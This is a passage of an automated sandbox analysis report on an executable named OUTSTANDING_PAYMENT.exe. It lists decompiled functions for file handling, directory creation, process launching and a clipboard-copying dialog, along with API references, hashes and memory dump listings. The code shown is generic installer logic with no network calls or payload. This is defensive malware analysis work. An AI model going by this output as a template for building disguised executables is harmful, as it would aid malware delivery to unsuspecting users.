                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2547128583-0
                                                                                                                        • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                                                        • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                                                                                        • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                                                        • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 68%
                                                                                                                        			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                                        0x0040615c
                                                                                                                        0x00406169
                                                                                                                        0x0040617e
                                                                                                                        0x00406184

                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe,80000000,00000003), ref: 0040615C
                                                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 415043291-0
                                                                                                                        • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                                                        • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                                                                                        • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                                                        • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                                                                                                                        0x00406138
                                                                                                                        0x0040613e
                                                                                                                        0x00406143
                                                                                                                        0x0040614c
                                                                                                                        0x0040614c
                                                                                                                        0x00406155

                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                                                        • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                        • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                                                                                        • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                        • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                                                        0x00405c1c
                                                                                                                        0x00405c24
                                                                                                                        0x00000000
                                                                                                                        0x00405c2a
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                                                        • GetLastError.KERNEL32 ref: 00405C2A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1375471231-0
                                                                                                                        • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                                                        • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                                                                                        • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                                                        • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                        0x0040620e
                                                                                                                        0x0040621e
                                                                                                                        0x00406226
                                                                                                                        0x00000000
                                                                                                                        0x0040622d
                                                                                                                        0x00000000
                                                                                                                        0x0040622f

                                                                                                                        APIs
                                                                                                                        • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040E23E,0040CEF0,00403579,0040CEF0,0040E23E,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3934441357-0
                                                                                                                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                        • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                                                                                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                        • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004061DB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                        0x004061df
                                                                                                                        0x004061ef
                                                                                                                        0x004061f7
                                                                                                                        0x00000000
                                                                                                                        0x004061fe
                                                                                                                        0x00000000
                                                                                                                        0x00406200

                                                                                                                        APIs
                                                                                                                        • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                        • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                                                                                        • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                        • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                        0x00403606
                                                                                                                        0x0040360c

                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 973152223-0
                                                                                                                        • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                        • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                        • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                        • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 78%
                                                                                                                        			E00401FA4() {
				void* _t9;
				char _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7);
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                                                                                                        0x00401faa
                                                                                                                        0x00401faf
                                                                                                                        0x00401fb5
                                                                                                                        0x00401fba
                                                                                                                        0x00401fbe
                                                                                                                        0x0040292e
                                                                                                                        0x00401fc4
                                                                                                                        0x00401fc7
                                                                                                                        0x00401fca
                                                                                                                        0x00401fd2
                                                                                                                        0x00401fe1
                                                                                                                        0x00401fe3
                                                                                                                        0x00401fe3
                                                                                                                        0x00401fd4
                                                                                                                        0x00401fd8
                                                                                                                        0x00401fd8
                                                                                                                        0x00401fd2
                                                                                                                        0x00401fea
                                                                                                                        0x00401feb
                                                                                                                        0x00401feb
                                                                                                                        0x00402c2d
                                                                                                                        0x00402c39

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                          • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                                                          • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                          • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                                                                                                                          • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                                                          • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                                                                          • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                                                                                          • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2972824698-0
                                                                                                                        • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                                                                                        • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                                                                                        • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                                                                                        • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 95%
                                                                                                                        			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                                                                                                                        0x00405811
                                                                                                                        0x00405817
                                                                                                                        0x00405821
                                                                                                                        0x00405824
                                                                                                                        0x004059ba
                                                                                                                        0x004059de
                                                                                                                        0x004059de
                                                                                                                        0x004059f1
                                                                                                                        0x00405a0f
                                                                                                                        0x00405a11
                                                                                                                        0x00405a19
                                                                                                                        0x00405a6f
                                                                                                                        0x00405a73
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405a75
                                                                                                                        0x00405a7b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405a85
                                                                                                                        0x00405a8d
                                                                                                                        0x00405a90
                                                                                                                        0x00405b92
                                                                                                                        0x00000000
                                                                                                                        0x00405b92
                                                                                                                        0x00405a9f
                                                                                                                        0x00405aaa
                                                                                                                        0x00405ab3
                                                                                                                        0x00405abe
                                                                                                                        0x00405ac1
                                                                                                                        0x00405aca
                                                                                                                        0x00405ad0
                                                                                                                        0x00405ad3
                                                                                                                        0x00405ad3
                                                                                                                        0x00405aeb
                                                                                                                        0x00405af4
                                                                                                                        0x00405af7
                                                                                                                        0x00405afe
                                                                                                                        0x00405b05
                                                                                                                        0x00405b0d
                                                                                                                        0x00405b0d
                                                                                                                        0x00405b24
                                                                                                                        0x00405b24
                                                                                                                        0x00405b2b
                                                                                                                        0x00405b31
                                                                                                                        0x00405b3d
                                                                                                                        0x00405b44
                                                                                                                        0x00405b4d
                                                                                                                        0x00405b4f
                                                                                                                        0x00405b52
                                                                                                                        0x00405b61
                                                                                                                        0x00405b64
                                                                                                                        0x00405b6a
                                                                                                                        0x00405b6b
                                                                                                                        0x00405b71
                                                                                                                        0x00405b72
                                                                                                                        0x00405b73
                                                                                                                        0x00405b7b
                                                                                                                        0x00405b86
                                                                                                                        0x00405b8c
                                                                                                                        0x00405b8c
                                                                                                                        0x00000000
                                                                                                                        0x00405aeb
                                                                                                                        0x00405a21
                                                                                                                        0x00405a51
                                                                                                                        0x00405a59
                                                                                                                        0x00405a64
                                                                                                                        0x00405a64
                                                                                                                        0x00405a6a
                                                                                                                        0x00000000
                                                                                                                        0x00405a6a
                                                                                                                        0x00405a25
                                                                                                                        0x00405a2f
                                                                                                                        0x00000000
